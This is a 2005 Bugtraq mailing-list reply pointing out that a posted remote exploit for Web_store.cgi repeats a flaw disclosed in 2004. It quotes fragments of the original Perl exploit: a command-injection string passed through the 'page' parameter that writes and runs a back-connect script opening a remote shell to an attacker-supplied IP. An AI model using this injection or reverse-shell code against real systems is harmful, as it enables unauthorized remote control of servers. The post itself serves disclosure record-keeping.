From: security curmudgeon <jericho at attrition.org>
To: bugtraq at securityfocus.com
Date: Wed, 22 Jun 2005 04:47:00 -0400 (EDT)
Subject: Re: Remote Exploit for  Web_store.cgi

On Mon, 13 Jun 2005 ActionSpider at securityfocus.com wrote:

: #!/usr/bin/perl -w
: #
: #               Remote Command Execution Vulnerability In Web_store.cgi 

: $string="/$path/web_store.cgi?page=.html|cd /tmp;echo ".q{use 
Socket;$execute= 'echo "`uname -a`";echo
|| die("Error: $!\n");$paddr=sockaddr_in($port,
$iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, 
PF_INET, SOCK_STREAM, $proto) || die("Error:
$!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, 
">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR,
">&SOCKET");system($execute);close(STDIN)}." >>dc.pl;perl dc.pl $ip 

This was disclosed on 2004-07-17 by Zero_X www.lobnan.de Team
(zero-x at linuxmail.org).


